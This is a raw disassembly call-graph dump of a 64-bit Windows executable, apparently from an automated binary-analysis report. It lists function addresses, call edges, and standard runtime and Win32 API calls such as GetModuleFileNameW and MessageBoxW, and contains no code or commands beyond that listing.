7ff7f91e2710 54 API calls 16637->16638 16638->16622 16641 7ff7f91e1ca5 16640->16641 16642 7ff7f91f49f4 49 API calls 16641->16642 16643 7ff7f91e1cc8 16642->16643 16643->16306 16645 7ff7f91e9400 2 API calls 16644->16645 16646 7ff7f91e8ba4 16645->16646 16647 7ff7f91f82a8 38 API calls 16646->16647 16648 7ff7f91e8bb6 __std_exception_destroy 16647->16648 16648->16320 16650 7ff7f91e45bc 16649->16650 16651 7ff7f91e9400 2 API calls 16650->16651 16652 7ff7f91e45e4 16651->16652 16653 7ff7f91e9400 2 API calls 16652->16653 16654 7ff7f91e45f7 16653->16654 18049 7ff7f91f6004 16654->18049 16657 7ff7f91ec5c0 _log10_special 8 API calls 16658 7ff7f91e392b 16657->16658 16658->16309 16659 7ff7f91e7f80 16658->16659 16660 7ff7f91e7fa4 16659->16660 16661 7ff7f91f0744 73 API calls 16660->16661 16666 7ff7f91e807b __std_exception_destroy 16660->16666 16662 7ff7f91e7fc0 16661->16662 16662->16666 18441 7ff7f91f7938 16662->18441 16664 7ff7f91f0744 73 API calls 16667 7ff7f91e7fd5 16664->16667 16665 7ff7f91f040c _fread_nolock 53 API calls 16665->16667 16666->16313 16667->16664 16667->16665 16667->16666 16669 7ff7f91f00ec 16668->16669 18456 7ff7f91efe98 16669->18456 16671 7ff7f91f0105 16671->16309 16673 7ff7f91ec8c0 16672->16673 16674 7ff7f91e2734 GetCurrentProcessId 16673->16674 16675 7ff7f91e1c80 49 API calls 16674->16675 16676 7ff7f91e2787 16675->16676 16677 7ff7f91f49f4 49 API calls 16676->16677 16678 7ff7f91e27cf 16677->16678 16679 7ff7f91e2620 12 API calls 16678->16679 16680 7ff7f91e27f1 16679->16680 16681 7ff7f91ec5c0 _log10_special 8 API calls 16680->16681 16682 7ff7f91e2801 16681->16682 16682->16374 16684 7ff7f91e9400 2 API calls 16683->16684 16685 7ff7f91e8b4c 16684->16685 16686 7ff7f91e9400 2 API calls 16685->16686 16687 7ff7f91e8b5c 16686->16687 16688 7ff7f91f82a8 38 API calls 16687->16688 16689 7ff7f91e8b6a __std_exception_destroy 16688->16689 16689->16323 16691 7ff7f91e1c80 49 API calls 16690->16691 16692 7ff7f91e44ed 16691->16692 16692->16350 16694 7ff7f91e1c80 49 API calls 16693->16694 16695 7ff7f91e4650 16694->16695 16695->16368 16697 7ff7f91e6dc5 16696->16697 16698 7ff7f91e3e6c 16697->16698 16699 7ff7f91f4f78 _get_daylight 11 API calls 16697->16699 16702 7ff7f91e7330 16698->16702 16700 7ff7f91e6dd2 16699->16700 16701 7ff7f91e2910 54 API calls 16700->16701 16701->16698 18467 7ff7f91e1470 16702->18467 16704 7ff7f91e7358 16705 7ff7f91e4620 49 API calls 16704->16705 16715 7ff7f91e74a9 __std_exception_destroy 16704->16715 16706 7ff7f91e737a 16705->16706 16707 7ff7f91e737f 16706->16707 16708 7ff7f91e4620 49 API calls 16706->16708 16710 7ff7f91e2a50 54 API calls 16707->16710 16709 7ff7f91e739e 16708->16709 16709->16707 16711 7ff7f91e4620 49 API calls 16709->16711 16710->16715 16712 7ff7f91e73ba 16711->16712 16712->16707 16713 7ff7f91e73c3 16712->16713 16714 7ff7f91e2710 54 API calls 16713->16714 16716 7ff7f91e7433 __std_exception_destroy memcpy_s 16713->16716 16714->16715 16715->16403 16716->16403 16729 7ff7f91e6e0c 16717->16729 16718 7ff7f91ec5c0 _log10_special 8 API calls 16720 7ff7f91e6f41 16718->16720 16719 7ff7f91e1840 45 API calls 16719->16729 16720->16406 16721 7ff7f91e6f9a 16723 7ff7f91e2710 54 API calls 16721->16723 16722 7ff7f91e1c80 49 API calls 16722->16729 16735 7ff7f91e6f2f 16723->16735 16724 7ff7f91e6f87 16725 7ff7f91e2710 54 API calls 16724->16725 16725->16735 16726 7ff7f91e4550 10 API calls 16726->16729 16727 7ff7f91e7e10 52 API calls 16727->16729 16728 7ff7f91e2a50 54 API calls 16728->16729 16729->16719 16729->16721 16729->16722 16729->16724 16729->16726 16729->16727 16729->16728 16730 7ff7f91e6f74 16729->16730 16732 7ff7f91e1600 118 API calls 16729->16732 16733 7ff7f91e6f5d 16729->16733 16729->16735 16731 7ff7f91e2710 54 API calls 16730->16731 16731->16735 16732->16729 16734 7ff7f91e2710 54 API calls 16733->16734 16734->16735 16735->16718 18497 7ff7f91e9070 16736->18497 16738 7ff7f91e71b9 16739 7ff7f91e9070 3 API calls 16738->16739 16740 7ff7f91e71cc 16739->16740 16741 7ff7f91e71ff 16740->16741 16742 7ff7f91e71e4 16740->16742 16743 7ff7f91e2710 54 API calls 16741->16743 18501 7ff7f91e76b0 GetProcAddress 16742->18501 16745 7ff7f91e3eb7 16743->16745 16745->16419 16746 7ff7f91e74e0 16745->16746 16753 7ff7f91ec8c0 16752->16753 16754 7ff7f91e2a74 GetCurrentProcessId 16753->16754 16755 7ff7f91e1c80 49 API calls 16754->16755 16756 7ff7f91e2ac7 16755->16756 16757 7ff7f91f49f4 49 API calls 16756->16757 16758 7ff7f91e2b0f 16757->16758 16759 7ff7f91e2620 12 API calls 16758->16759 16760 7ff7f91e2b31 16759->16760 16761 7ff7f91ec5c0 _log10_special 8 API calls 16760->16761 16762 7ff7f91e2b41 16761->16762 18573 7ff7f91e6350 16770->18573 16774 7ff7f91e3381 16778 7ff7f91e3399 16774->16778 18641 7ff7f91e6040 16774->18641 16776 7ff7f91e338d 16776->16778 18650 7ff7f91e61d0 16776->18650 16779 7ff7f91e3670 16778->16779 16780 7ff7f91e367e 16779->16780 16781 7ff7f91e368f 16780->16781 18861 7ff7f91e9050 FreeLibrary 16780->18861 16781->16395 16790 7ff7f91f54dc EnterCriticalSection 16783->16790 16792 7ff7f91e36bc GetModuleFileNameW 16791->16792 16792->16483 16792->16484 16794 7ff7f91e932f FindClose 16793->16794 16795 7ff7f91e9342 16793->16795 16794->16795 16796 7ff7f91ec5c0 _log10_special 8 API calls 16795->16796 16797 7ff7f91e371a 16796->16797 16797->16489 16797->16490 16799 7ff7f91ec8c0 16798->16799 16800 7ff7f91e2c70 GetCurrentProcessId 16799->16800 16829 7ff7f91e26b0 16800->16829 16802 7ff7f91e2cb9 16833 7ff7f91f4c48 16802->16833 16805 7ff7f91e26b0 48 API calls 16806 7ff7f91e2d34 FormatMessageW 16805->16806 16808 7ff7f91e2d7f MessageBoxW 16806->16808 16809 7ff7f91e2d6d 16806->16809 16811 7ff7f91ec5c0 _log10_special 8 API calls 16808->16811 16810 7ff7f91e26b0 48 API calls 16809->16810 16810->16808 16812 7ff7f91e2daf 16811->16812 16812->16487 16814 7ff7f91e93b0 GetFinalPathNameByHandleW CloseHandle 16813->16814 16815 7ff7f91e3730 16813->16815 16814->16815 16815->16497 16815->16498 16817 7ff7f91e2834 16816->16817 16818 7ff7f91e26b0 48 API calls 16817->16818 16819 7ff7f91e2887 16818->16819 16820 7ff7f91f4c48 48 API calls 16819->16820 16821 7ff7f91e28d0 MessageBoxW 16820->16821 16822 7ff7f91ec5c0 _log10_special 8 API calls 16821->16822 16823 7ff7f91e2900 16822->16823 16823->16487 16825 7ff7f91e9505 16824->16825 16826 7ff7f91e94da WideCharToMultiByte 16824->16826 16827 7ff7f91e9522 WideCharToMultiByte 16825->16827 16828 7ff7f91e951b __std_exception_destroy 16825->16828 16826->16825 16826->16828 16827->16828 16828->16494 16830 7ff7f91e26d5 16829->16830 16831 7ff7f91f4c48 48 API calls 16830->16831 16832 7ff7f91e26f8 16831->16832 16832->16802 16834 7ff7f91f4ca2 16833->16834 16835 7ff7f91f4cc7 16834->16835 16837 7ff7f91f4d03 16834->16837 16836 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 16835->16836 16840 7ff7f91f4cf1 16836->16840 16851 7ff7f91f3000 16837->16851 16839 7ff7f91f4de4 16842 7ff7f91fa9b8 __free_lconv_mon 11 API calls 16839->16842 16841 7ff7f91ec5c0 _log10_special 8 API calls 16840->16841 16843 7ff7f91e2d04 16841->16843 16842->16840 16843->16805 16845 7ff7f91f4db9 16848 7ff7f91fa9b8 __free_lconv_mon 11 API calls 16845->16848 16846 7ff7f91f4e0a 16846->16839 16847 7ff7f91f4e14 16846->16847 16850 7ff7f91fa9b8 __free_lconv_mon 11 API calls 16847->16850 16848->16840 16849 7ff7f91f4db0 16849->16839 16849->16845 16850->16840 16852 7ff7f91f303e 16851->16852 16857 7ff7f91f302e 16851->16857 16853 7ff7f91f3047 16852->16853 16858 7ff7f91f3075 16852->16858 16855 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 16853->16855 16854 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 16856 7ff7f91f306d 16854->16856 16855->16856 16856->16839 16856->16845 16856->16846 16856->16849 16857->16854 16858->16856 16858->16857 16862 7ff7f91f3a14 16858->16862 16895 7ff7f91f3460 16858->16895 16932 7ff7f91f2bf0 16858->16932 16863 7ff7f91f3a56 16862->16863 16864 7ff7f91f3ac7 16862->16864 16867 7ff7f91f3af1 16863->16867 16868 7ff7f91f3a5c 16863->16868 16865 7ff7f91f3b20 16864->16865 16866 7ff7f91f3acc 16864->16866 16873 7ff7f91f3b37 16865->16873 16874 7ff7f91f3b2a 16865->16874 16879 7ff7f91f3b2f 16865->16879 16869 7ff7f91f3b01 16866->16869 16870 7ff7f91f3ace 16866->16870 16955 7ff7f91f1dc4 16867->16955 16871 7ff7f91f3a61 16868->16871 16872 7ff7f91f3a90 16868->16872 16962 7ff7f91f19b4 16869->16962 16883 7ff7f91f3add 16870->16883 16886 7ff7f91f3a70 16870->16886 16871->16873 16875 7ff7f91f3a67 16871->16875 16872->16875 16872->16879 16969 7ff7f91f471c 16873->16969 16874->16867 16874->16879 16882 7ff7f91f3aa2 16875->16882 16875->16886 16890 7ff7f91f3a8b 16875->16890 16893 7ff7f91f3b60 16879->16893 16973 7ff7f91f21d4 16879->16973 16882->16893 16945 7ff7f91f4504 16882->16945 16883->16867 16887 7ff7f91f3ae2 16883->16887 16885 7ff7f91ec5c0 _log10_special 8 API calls 16888 7ff7f91f3e5a 16885->16888 16886->16893 16935 7ff7f91f41c8 16886->16935 16887->16893 16951 7ff7f91f45c8 16887->16951 16888->16858 16890->16893 16894 7ff7f91f3d4c 16890->16894 16980 7ff7f91f4830 16890->16980 16893->16885 16894->16893 16986 7ff7f91fea78 16894->16986 16896 7ff7f91f3484 16895->16896 16897 7ff7f91f346e 16895->16897 16898 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 16896->16898 16899 7ff7f91f34c4 16896->16899 16897->16899 16900 7ff7f91f3a56 16897->16900 16901 7ff7f91f3ac7 16897->16901 16898->16899 16899->16858 16904 7ff7f91f3af1 16900->16904 16905 7ff7f91f3a5c 16900->16905 16902 7ff7f91f3b20 16901->16902 16903 7ff7f91f3acc 16901->16903 16910 7ff7f91f3b37 16902->16910 16912 7ff7f91f3b2a 16902->16912 16917 7ff7f91f3b2f 16902->16917 16906 7ff7f91f3b01 16903->16906 16907 7ff7f91f3ace 16903->16907 16914 7ff7f91f1dc4 38 API calls 16904->16914 16908 7ff7f91f3a61 16905->16908 16909 7ff7f91f3a90 16905->16909 16915 7ff7f91f19b4 38 API calls 16906->16915 16911 7ff7f91f3a70 16907->16911 16920 7ff7f91f3add 16907->16920 16908->16910 16913 7ff7f91f3a67 16908->16913 16909->16913 16909->16917 16918 7ff7f91f471c 45 API calls 16910->16918 16916 7ff7f91f41c8 47 API calls 16911->16916 16930 7ff7f91f3b60 16911->16930 16912->16904 16912->16917 16913->16911 16921 7ff7f91f3aa2 16913->16921 16927 7ff7f91f3a8b 16913->16927 16914->16927 16915->16927 16916->16927 16919 7ff7f91f21d4 38 API calls 16917->16919 16917->16930 16918->16927 16919->16927 16920->16904 16922 7ff7f91f3ae2 16920->16922 16923 7ff7f91f4504 46 API calls 16921->16923 16921->16930 16925 7ff7f91f45c8 37 API calls 16922->16925 16922->16930 16923->16927 16924 7ff7f91ec5c0 _log10_special 8 API calls 16926 7ff7f91f3e5a 16924->16926 16925->16927 16926->16858 16928 7ff7f91f4830 45 API calls 16927->16928 16927->16930 16931 7ff7f91f3d4c 16927->16931 16928->16931 16929 7ff7f91fea78 46 API calls 16929->16931 16930->16924 16931->16929 16931->16930 17180 7ff7f91f1038 16932->17180 16936 7ff7f91f41ee 16935->16936 16998 7ff7f91f0bf0 16936->16998 16941 7ff7f91f4830 45 API calls 16942 7ff7f91f4333 16941->16942 16943 7ff7f91f43c1 16942->16943 16944 7ff7f91f4830 45 API calls 16942->16944 16943->16890 16944->16943 16946 7ff7f91f4539 16945->16946 16947 7ff7f91f4557 16946->16947 16948 7ff7f91f457e 16946->16948 16949 7ff7f91f4830 45 API calls 16946->16949 16950 7ff7f91fea78 46 API calls 16947->16950 16948->16890 16949->16947 16950->16948 16952 7ff7f91f45e9 16951->16952 16953 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 16952->16953 16954 7ff7f91f461a 16952->16954 16953->16954 16954->16890 16956 7ff7f91f1df7 16955->16956 16957 7ff7f91f1e26 16956->16957 16959 7ff7f91f1ee3 16956->16959 16961 7ff7f91f1e63 16957->16961 17134 7ff7f91f0c98 16957->17134 16960 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 16959->16960 16960->16961 16961->16890 16963 7ff7f91f19e7 16962->16963 16964 7ff7f91f1a16 16963->16964 16966 7ff7f91f1ad3 16963->16966 16965 7ff7f91f0c98 12 API calls 16964->16965 16968 7ff7f91f1a53 16964->16968 16965->16968 16967 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 16966->16967 16967->16968 16968->16890 16970 7ff7f91f475f 16969->16970 16971 7ff7f91f4763 __crtLCMapStringW 16970->16971 17142 7ff7f91f47b8 16970->17142 16971->16890 16974 7ff7f91f2207 16973->16974 16975 7ff7f91f2236 16974->16975 16977 7ff7f91f22f3 16974->16977 16976 7ff7f91f0c98 12 API calls 16975->16976 16979 7ff7f91f2273 16975->16979 16976->16979 16978 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 16977->16978 16978->16979 16979->16890 16981 7ff7f91f4847 16980->16981 17146 7ff7f91fda28 16981->17146 16987 7ff7f91feaa9 16986->16987 16996 7ff7f91feab7 16986->16996 16988 7ff7f91fead7 16987->16988 16989 7ff7f91f4830 45 API calls 16987->16989 16987->16996 16990 7ff7f91feb0f 16988->16990 16991 7ff7f91feae8 16988->16991 16989->16988 16993 7ff7f91feb9a 16990->16993 16994 7ff7f91feb39 16990->16994 16990->16996 17170 7ff7f9200110 16991->17170 16995 7ff7f91ff910 _fread_nolock MultiByteToWideChar 16993->16995 16994->16996 17173 7ff7f91ff910 16994->17173 16995->16996 16996->16894 16999 7ff7f91f0c27 16998->16999 17005 7ff7f91f0c16 16998->17005 17000 7ff7f91fd66c _fread_nolock 12 API calls 16999->17000 16999->17005 17001 7ff7f91f0c54 17000->17001 17002 7ff7f91f0c68 17001->17002 17003 7ff7f91fa9b8 __free_lconv_mon 11 API calls 17001->17003 17004 7ff7f91fa9b8 __free_lconv_mon 11 API calls 17002->17004 17003->17002 17004->17005 17006 7ff7f91fe5e0 17005->17006 17007 7ff7f91fe630 17006->17007 17008 7ff7f91fe5fd 17006->17008 17007->17008 17011 7ff7f91fe662 17007->17011 17009 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17008->17009 17018 7ff7f91f4311 17009->17018 17010 7ff7f91fe775 17012 7ff7f91fe867 17010->17012 17014 7ff7f91fe82d 17010->17014 17015 7ff7f91fe7fc 17010->17015 17017 7ff7f91fe7bf 17010->17017 17020 7ff7f91fe7b5 17010->17020 17011->17010 17023 7ff7f91fe6aa 17011->17023 17061 7ff7f91fdacc 17012->17061 17054 7ff7f91fde64 17014->17054 17047 7ff7f91fe144 17015->17047 17037 7ff7f91fe374 17017->17037 17018->16941 17018->16942 17020->17014 17022 7ff7f91fe7ba 17020->17022 17022->17015 17022->17017 17023->17018 17028 7ff7f91fa514 17023->17028 17026 7ff7f91fa970 _isindst 17 API calls 17027 7ff7f91fe8c4 17026->17027 17029 7ff7f91fa521 17028->17029 17030 7ff7f91fa52b 17028->17030 17029->17030 17035 7ff7f91fa546 17029->17035 17031 7ff7f91f4f78 _get_daylight 11 API calls 17030->17031 17032 7ff7f91fa532 17031->17032 17033 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17032->17033 17034 7ff7f91fa53e 17033->17034 17034->17018 17034->17026 17035->17034 17036 7ff7f91f4f78 _get_daylight 11 API calls 17035->17036 17036->17032 17070 7ff7f920411c 17037->17070 17041 7ff7f91fe41c 17042 7ff7f91fe471 17041->17042 17044 7ff7f91fe43c 17041->17044 17046 7ff7f91fe420 17041->17046 17123 7ff7f91fdf60 17042->17123 17119 7ff7f91fe21c 17044->17119 17046->17018 17048 7ff7f920411c 38 API calls 17047->17048 17049 7ff7f91fe18e 17048->17049 17050 7ff7f9203b64 37 API calls 17049->17050 17051 7ff7f91fe1de 17050->17051 17052 7ff7f91fe1e2 17051->17052 17053 7ff7f91fe21c 45 API calls 17051->17053 17052->17018 17053->17052 17055 7ff7f920411c 38 API calls 17054->17055 17056 7ff7f91fdeaf 17055->17056 17057 7ff7f9203b64 37 API calls 17056->17057 17058 7ff7f91fdf07 17057->17058 17059 7ff7f91fdf0b 17058->17059 17060 7ff7f91fdf60 45 API calls 17058->17060 17059->17018 17060->17059 17062 7ff7f91fdb44 17061->17062 17063 7ff7f91fdb11 17061->17063 17065 7ff7f91fdb5c 17062->17065 17067 7ff7f91fdbdd 17062->17067 17064 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17063->17064 17069 7ff7f91fdb3d memcpy_s 17064->17069 17066 7ff7f91fde64 46 API calls 17065->17066 17066->17069 17068 7ff7f91f4830 45 API calls 17067->17068 17067->17069 17068->17069 17069->17018 17071 7ff7f920416f fegetenv 17070->17071 17072 7ff7f9207e9c 37 API calls 17071->17072 17076 7ff7f92041c2 17072->17076 17073 7ff7f92041ef 17078 7ff7f91fa514 __std_exception_copy 37 API calls 17073->17078 17074 7ff7f92042b2 17075 7ff7f9207e9c 37 API calls 17074->17075 17077 7ff7f92042dc 17075->17077 17076->17074 17079 7ff7f920428c 17076->17079 17080 7ff7f92041dd 17076->17080 17081 7ff7f9207e9c 37 API calls 17077->17081 17082 7ff7f920426d 17078->17082 17085 7ff7f91fa514 __std_exception_copy 37 API calls 17079->17085 17080->17073 17080->17074 17083 7ff7f92042ed 17081->17083 17084 7ff7f9205394 17082->17084 17089 7ff7f9204275 17082->17089 17086 7ff7f9208090 20 API calls 17083->17086 17087 7ff7f91fa970 _isindst 17 API calls 17084->17087 17085->17082 17098 7ff7f9204356 memcpy_s 17086->17098 17088 7ff7f92053a9 17087->17088 17090 7ff7f91ec5c0 _log10_special 8 API calls 17089->17090 17091 7ff7f91fe3c1 17090->17091 17115 7ff7f9203b64 17091->17115 17092 7ff7f92046ff memcpy_s 17093 7ff7f9204a3f 17095 7ff7f9203c80 37 API calls 17093->17095 17094 7ff7f9204397 memcpy_s 17109 7ff7f92047f3 memcpy_s 17094->17109 17110 7ff7f9204cdb memcpy_s 17094->17110 17097 7ff7f9205157 17095->17097 17096 7ff7f92049eb 17096->17093 17099 7ff7f92053ac memcpy_s 37 API calls 17096->17099 17104 7ff7f92053ac memcpy_s 37 API calls 17097->17104 17113 7ff7f92051b2 17097->17113 17098->17092 17098->17094 17100 7ff7f91f4f78 _get_daylight 11 API calls 17098->17100 17099->17093 17101 7ff7f92047d0 17100->17101 17102 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17101->17102 17102->17094 17103 7ff7f9205338 17107 7ff7f9207e9c 37 API calls 17103->17107 17104->17113 17105 7ff7f91f4f78 11 API calls _get_daylight 17105->17110 17106 7ff7f91f4f78 11 API calls _get_daylight 17106->17109 17107->17089 17108 7ff7f9203c80 37 API calls 17108->17113 17109->17096 17109->17106 17111 7ff7f91fa950 37 API calls _invalid_parameter_noinfo 17109->17111 17110->17093 17110->17096 17110->17105 17114 7ff7f91fa950 37 API calls _invalid_parameter_noinfo 17110->17114 17111->17109 17112 7ff7f92053ac memcpy_s 37 API calls 17112->17113 17113->17103 17113->17108 17113->17112 17114->17110 17116 7ff7f9203b83 17115->17116 17117 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17116->17117 17118 7ff7f9203bae memcpy_s 17116->17118 17117->17118 17118->17041 17120 7ff7f91fe248 memcpy_s 17119->17120 17121 7ff7f91f4830 45 API calls 17120->17121 17122 7ff7f91fe302 memcpy_s 17120->17122 17121->17122 17122->17046 17124 7ff7f91fdf9b 17123->17124 17128 7ff7f91fdfe8 memcpy_s 17123->17128 17125 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17124->17125 17126 7ff7f91fdfc7 17125->17126 17126->17046 17127 7ff7f91fe053 17129 7ff7f91fa514 __std_exception_copy 37 API calls 17127->17129 17128->17127 17130 7ff7f91f4830 45 API calls 17128->17130 17133 7ff7f91fe095 memcpy_s 17129->17133 17130->17127 17131 7ff7f91fa970 _isindst 17 API calls 17132 7ff7f91fe140 17131->17132 17133->17131 17135 7ff7f91f0ccf 17134->17135 17141 7ff7f91f0cbe 17134->17141 17136 7ff7f91fd66c _fread_nolock 12 API calls 17135->17136 17135->17141 17138 7ff7f91f0d00 17136->17138 17137 7ff7f91f0d14 17140 7ff7f91fa9b8 __free_lconv_mon 11 API calls 17137->17140 17138->17137 17139 7ff7f91fa9b8 __free_lconv_mon 11 API calls 17138->17139 17139->17137 17140->17141 17141->16961 17143 7ff7f91f47d6 17142->17143 17144 7ff7f91f47de 17142->17144 17145 7ff7f91f4830 45 API calls 17143->17145 17144->16971 17145->17144 17147 7ff7f91fda41 17146->17147 17148 7ff7f91f486f 17146->17148 17147->17148 17154 7ff7f9203374 17147->17154 17150 7ff7f91fda94 17148->17150 17151 7ff7f91f487f 17150->17151 17152 7ff7f91fdaad 17150->17152 17151->16894 17152->17151 17167 7ff7f92026c0 17152->17167 17155 7ff7f91fb1c0 __GetCurrentState 45 API calls 17154->17155 17156 7ff7f9203383 17155->17156 17157 7ff7f92033ce 17156->17157 17166 7ff7f9200348 EnterCriticalSection 17156->17166 17157->17148 17168 7ff7f91fb1c0 __GetCurrentState 45 API calls 17167->17168 17169 7ff7f92026c9 17168->17169 17176 7ff7f9206df8 17170->17176 17175 7ff7f91ff919 MultiByteToWideChar 17173->17175 17179 7ff7f9206e5c 17176->17179 17177 7ff7f91ec5c0 _log10_special 8 API calls 17178 7ff7f920012d 17177->17178 17178->16996 17179->17177 17181 7ff7f91f107f 17180->17181 17182 7ff7f91f106d 17180->17182 17185 7ff7f91f108d 17181->17185 17189 7ff7f91f10c9 17181->17189 17183 7ff7f91f4f78 _get_daylight 11 API calls 17182->17183 17184 7ff7f91f1072 17183->17184 17186 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17184->17186 17187 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17185->17187 17192 7ff7f91f107d 17186->17192 17187->17192 17188 7ff7f91f1445 17190 7ff7f91f4f78 _get_daylight 11 API calls 17188->17190 17188->17192 17189->17188 17191 7ff7f91f4f78 _get_daylight 11 API calls 17189->17191 17193 7ff7f91f16d9 17190->17193 17194 7ff7f91f143a 17191->17194 17192->16858 17195 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17193->17195 17196 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17194->17196 17195->17192 17196->17188 17198 7ff7f91f0774 17197->17198 17225 7ff7f91f04d4 17198->17225 17200 7ff7f91f078d 17200->16512 17237 7ff7f91f042c 17201->17237 17205 7ff7f91ec8c0 17204->17205 17206 7ff7f91e2930 GetCurrentProcessId 17205->17206 17207 7ff7f91e1c80 49 API calls 17206->17207 17208 7ff7f91e2979 17207->17208 17251 7ff7f91f49f4 17208->17251 17213 7ff7f91e1c80 49 API calls 17214 7ff7f91e29ff 17213->17214 17281 7ff7f91e2620 17214->17281 17217 7ff7f91ec5c0 _log10_special 8 API calls 17218 7ff7f91e2a31 17217->17218 17218->16551 17220 7ff7f91f0189 17219->17220 17224 7ff7f91e1b89 17219->17224 17221 7ff7f91f4f78 _get_daylight 11 API calls 17220->17221 17222 7ff7f91f018e 17221->17222 17223 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17222->17223 17223->17224 17224->16550 17224->16551 17226 7ff7f91f053e 17225->17226 17227 7ff7f91f04fe 17225->17227 17226->17227 17229 7ff7f91f054a 17226->17229 17228 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17227->17228 17230 7ff7f91f0525 17228->17230 17236 7ff7f91f54dc EnterCriticalSection 17229->17236 17230->17200 17238 7ff7f91e1a20 17237->17238 17239 7ff7f91f0456 17237->17239 17238->16520 17238->16521 17239->17238 17240 7ff7f91f0465 memcpy_s 17239->17240 17241 7ff7f91f04a2 17239->17241 17244 7ff7f91f4f78 _get_daylight 11 API calls 17240->17244 17250 7ff7f91f54dc EnterCriticalSection 17241->17250 17246 7ff7f91f047a 17244->17246 17248 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17246->17248 17248->17238 17255 7ff7f91f4a4e 17251->17255 17252 7ff7f91f4a73 17253 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17252->17253 17268 7ff7f91f4a9d 17253->17268 17254 7ff7f91f4aaf 17290 7ff7f91f2c80 17254->17290 17255->17252 17255->17254 17257 7ff7f91f4b8c 17259 7ff7f91fa9b8 __free_lconv_mon 11 API calls 17257->17259 17258 7ff7f91ec5c0 _log10_special 8 API calls 17260 7ff7f91e29c3 17258->17260 17259->17268 17269 7ff7f91f51d0 17260->17269 17262 7ff7f91f4b61 17265 7ff7f91fa9b8 __free_lconv_mon 11 API calls 17262->17265 17263 7ff7f91f4bb0 17263->17257 17264 7ff7f91f4bba 17263->17264 17267 7ff7f91fa9b8 __free_lconv_mon 11 API calls 17264->17267 17265->17268 17266 7ff7f91f4b58 17266->17257 17266->17262 17267->17268 17268->17258 17270 7ff7f91fb338 _get_daylight 11 API calls 17269->17270 17271 7ff7f91f51e7 17270->17271 17272 7ff7f91fec08 _get_daylight 11 API calls 17271->17272 17274 7ff7f91f5227 17271->17274 17278 7ff7f91e29e5 17271->17278 17273 7ff7f91f521c 17272->17273 17275 7ff7f91fa9b8 __free_lconv_mon 11 API calls 17273->17275 17274->17278 17428 7ff7f91fec90 17274->17428 17275->17274 17278->17213 17279 7ff7f91fa970 _isindst 17 API calls 17280 7ff7f91f526c 17279->17280 17282 7ff7f91e262f 17281->17282 17283 7ff7f91e9400 2 API calls 17282->17283 17284 7ff7f91e2660 17283->17284 17285 7ff7f91e2683 MessageBoxA 17284->17285 17286 7ff7f91e266f MessageBoxW 17284->17286 17287 7ff7f91e2690 17285->17287 17286->17287 17288 7ff7f91ec5c0 _log10_special 8 API calls 17287->17288 17289 7ff7f91e26a0 17288->17289 17289->17217 17291 7ff7f91f2cbe 17290->17291 17296 7ff7f91f2cae 17290->17296 17292 7ff7f91f2cc7 17291->17292 17302 7ff7f91f2cf5 17291->17302 17294 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17292->17294 17293 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17295 7ff7f91f2ced 17293->17295 17294->17295 17295->17257 17295->17262 17295->17263 17295->17266 17296->17293 17297 7ff7f91f4830 45 API calls 17297->17302 17299 7ff7f91f2fa4 17301 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17299->17301 17301->17296 17302->17295 17302->17296 17302->17297 17302->17299 17304 7ff7f91f3610 17302->17304 17330 7ff7f91f32d8 17302->17330 17360 7ff7f91f2b60 17302->17360 17305 7ff7f91f36c5 17304->17305 17306 7ff7f91f3652 17304->17306 17307 7ff7f91f371f 17305->17307 17308 7ff7f91f36ca 17305->17308 17309 7ff7f91f36ef 17306->17309 17310 7ff7f91f3658 17306->17310 17307->17309 17320 7ff7f91f372e 17307->17320 17328 7ff7f91f3688 17307->17328 17311 7ff7f91f36ff 17308->17311 17312 7ff7f91f36cc 17308->17312 17377 7ff7f91f1bc0 17309->17377 17317 7ff7f91f365d 17310->17317 17310->17320 17384 7ff7f91f17b0 17311->17384 17313 7ff7f91f366d 17312->17313 17319 7ff7f91f36db 17312->17319 17329 7ff7f91f375d 17313->17329 17363 7ff7f91f3f74 17313->17363 17317->17313 17318 7ff7f91f36a0 17317->17318 17317->17328 17318->17329 17373 7ff7f91f4430 17318->17373 17319->17309 17322 7ff7f91f36e0 17319->17322 17320->17329 17391 7ff7f91f1fd0 17320->17391 17325 7ff7f91f45c8 37 API calls 17322->17325 17322->17329 17324 7ff7f91ec5c0 _log10_special 8 API calls 17326 7ff7f91f39f3 17324->17326 17325->17328 17326->17302 17328->17329 17398 7ff7f91fe8c8 17328->17398 17329->17324 17331 7ff7f91f32e3 17330->17331 17332 7ff7f91f32f9 17330->17332 17334 7ff7f91f36c5 17331->17334 17335 7ff7f91f3652 17331->17335 17336 7ff7f91f3337 17331->17336 17333 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17332->17333 17332->17336 17333->17336 17337 7ff7f91f371f 17334->17337 17338 7ff7f91f36ca 17334->17338 17339 7ff7f91f36ef 17335->17339 17340 7ff7f91f3658 17335->17340 17336->17302 17337->17339 17349 7ff7f91f372e 17337->17349 17358 7ff7f91f3688 17337->17358 17341 7ff7f91f36ff 17338->17341 17342 7ff7f91f36cc 17338->17342 17344 7ff7f91f1bc0 38 API calls 17339->17344 17347 7ff7f91f365d 17340->17347 17340->17349 17345 7ff7f91f17b0 38 API calls 17341->17345 17343 7ff7f91f366d 17342->17343 17351 7ff7f91f36db 17342->17351 17346 7ff7f91f3f74 47 API calls 17343->17346 17359 7ff7f91f375d 